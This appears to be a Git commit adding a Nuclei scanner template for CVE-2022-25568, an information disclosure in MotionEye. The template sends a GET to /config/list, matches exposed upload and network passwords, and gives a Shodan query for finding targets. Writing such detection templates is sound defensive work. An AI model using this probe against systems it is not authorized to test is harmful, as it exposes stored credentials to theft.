Create CVE-2022-25568.yaml

patch-1
Dhiyaneshwaran 2023-10-11 02:31:40 +05:30 committed by GitHub
parent 032953c294
commit c97b868a5d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 40 additions and 0 deletions

View File

@ -0,0 +1,40 @@
id: CVE-2022-25568
info:
name: MotionEye Config Info Disclosure
author: DhiyaneshDK
severity: high
description: |
MotionEye v0.42.1 and below allows attackers to access sensitive information via a GET request to /config/list. To exploit this vulnerability, a regular user password must be unconfigured.
reference:
- https://www.pizzapower.me/2022/02/17/motioneye-config-info-disclosure/
- https://github.com/ccrisan/motioneye/issues/2292
- https://nvd.nist.gov/vuln/detail/cve-2022-25568
metadata:
max-request: 1
verified: true
shodan-query: html:"MotionEye"
tags: cve,cve2023,motioneye,config
http:
- method: GET
path:
- "{{BaseURL}}/config/list"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "upload_password"
- "network_password"
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200